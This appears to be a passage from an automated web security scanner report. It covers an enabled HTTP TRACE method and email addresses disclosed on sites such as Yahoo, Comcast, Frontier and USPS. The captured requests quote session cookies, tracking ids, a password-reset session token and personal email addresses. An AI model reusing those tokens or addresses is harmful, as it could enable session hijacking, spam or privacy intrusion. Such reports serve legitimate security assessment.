Host: www.whitefence.com


17.21. http://www2.whitefence.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www2.whitefence.com
Cookie: 231d4e53f578ac0a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 231d4e53f578ac0a; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=144480567.1743052426.1315328378.1315328378.1315328378.1; __utmb=144480567.1.10.1315328378; __utmc=144480567; __utmz=1444
...[SNIP]...

18. Email addresses disclosed  previous  next
There are 51 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


18.1. http://autos.yahoo.com/bentley/continental-gtc/2011/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /bentley/continental-gtc/2011/

Issue detail

The following email address was disclosed in the response:

Request

GET /bentley/continental-gtc/2011/ HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:47:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 3
Server: YTS/1.19.5
Proxy-Connection: keep-alive
Content-Length: 90155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" conte
...[SNIP]...
on Facebook","YGSH_FACEBOOK_URL":"http:\/\/www.facebook.com\/share.php?u=","YGSH_FAILED_PREREQS":"failed loading prerequisites","YGSH_FROM":"From:","YGSH_FROM_ERROR":"Re-enter your email address (e.g. yourname@example.com).","YGSH_FROM_REQUIRED":"Enter your email address.","YGSH_GOOGLE":"Google Bookmarks","YGSH_GOOGLE_HREF":"http:\/\/www.google.com\/bookmarks\/mark?op=edit","YGSH_GOOGLE_TITLE":"Bookmark this story","YG
...[SNIP]...

18.2. http://forums.comcast.com/html/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /html/js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /html/js/s_code.js HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Accept-Ranges: bytes
ETag: W/"18416-1312362512000"
Last-Modified: Wed, 03 Aug 2011 09:08:32 GMT
Vary: Accept-Encoding
Content-Length: 18416
Connection: close
Content-Type: text/javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="comcastsupportforumsdev"
var s=s_gi(s_account)
/*********
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

18.3. http://games.frontier.com/BodyScripts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /BodyScripts.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /BodyScripts.aspx HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 75424
Cache-Control: private, max-age=14400
Date: Tue, 06 Sep 2011 12:45:27 GMT
Connection: close

//::: jQuery
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License

...[SNIP]...
<iacobs@m0n5t3r.info>
...[SNIP]...

18.4. http://games.frontier.com/game.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /game.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /game.htm?code=119282623&lc=en&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91941
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:50:48 GMT
Date: Tue, 06 Sep 2011 12:50:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a id="Gid83" class="linkgizmo gameinfolink1 first odd" href="mailto:review@oberon-media.com?Subject=Mystery Age: Imperial Staff">
...[SNIP]...

18.5. http://l.yimg.com/a/combo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /a/combo

Issue detail

The following email address was disclosed in the response:

Request

GET /a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 01:16:03 GMT
Cache-Control: public, max-age=315360000
Expires: Fri, 03 Sep 2021 01:16:03 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 41359
Content-Length: 86727
Proxy-Connection: keep-alive
Server: YTS/1.19.5

/* yahoo-dom-event
Copyright (c) 2007, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.4.1
*/
if(typeof YAHOO=="undefined"||
...[SNIP]...
<meaghan@yahoo-inc.com>
...[SNIP]...

18.6. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The following email address was disclosed in the response:

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...
<a href="mailto:customerservice@optionshouse.com" target="_blank" title="customerservice@optionshouse.com">customerservice@optionshouse.com</a>
...[SNIP]...

18.7. https://login.comcast.net/myaccount/js/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/omniture.js

Issue detail

The following email address was disclosed in the response:

Request

GET /myaccount/js/omniture.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=494
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 21653

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...
6=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=^
...[SNIP]...

18.8. https://login.comcast.net/static/js/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /static/js/omniture.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/omniture.js?v=6 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:41 GMT
Server: Apache
Last-Modified: Tue, 30 Aug 2011 14:39:35 GMT
Accept-Ranges: bytes
Cache-Control: max-age=157083293
Expires: Sun, 28 Aug 2016 14:39:35 GMT
Vary: Accept-Encoding
Content-Length: 21653
Keep-Alive: timeout=1, max=347
Connection: Keep-Alive
Content-Type: application/x-javascript

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...
6=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=^
...[SNIP]...

18.9. https://login.yahoo.com/config/login_verify2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The following email address was disclosed in the response:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...

18.10. http://postcalc.usps.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: postcalc.usps.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 100056
Content-Length: 100056
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:53:06 GMT
Connection: close
Set-Cookie: NSC_fbh-qptudbmdtn_80=ffffffff3b22bf0e45525d5f4f58455e445a4a421548;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Postage P
...[SNIP]...
<a href="mailto:postalexplorer@usps.gov">
...[SNIP]...

18.11. http://sitesearch.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?q=isp+email&cat=com&con=www&sec=Customers&PageName=&PageName=Search%2BComcast.com HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; s_sq=%5B%5BB%5D%5D; mbox=session#1315327839174-766376#1315331767|PC#1315327839174-766376.19#1316539507|check#true#1315329967; bn_u=6923713561343025788; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331706445%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ado%2520i%2520need%2520a%2520separate%2520digital%2520cable%2520box%2520for%2520every%2520tv%253F%253A%2520faq%2520viewer%7C1315331706456%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%255D%7C1473182707243%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B; fsr.s={"v":1,"pv":9,"lc":{"d0":{"v":9,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; fsr.a=1315329910594

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:25:12 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 44227
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
</b> to corporate_communications@comcast.com and include ...b-roll... in the subject line, or contact: ...
<!--doc_category-->
...[SNIP]...

18.12. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The following email address was disclosed in the response:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
<a href="mailto:dfarrar7@earthlink.net">
...[SNIP]...

18.13. http://utdi.reachlocal.net/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.html HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
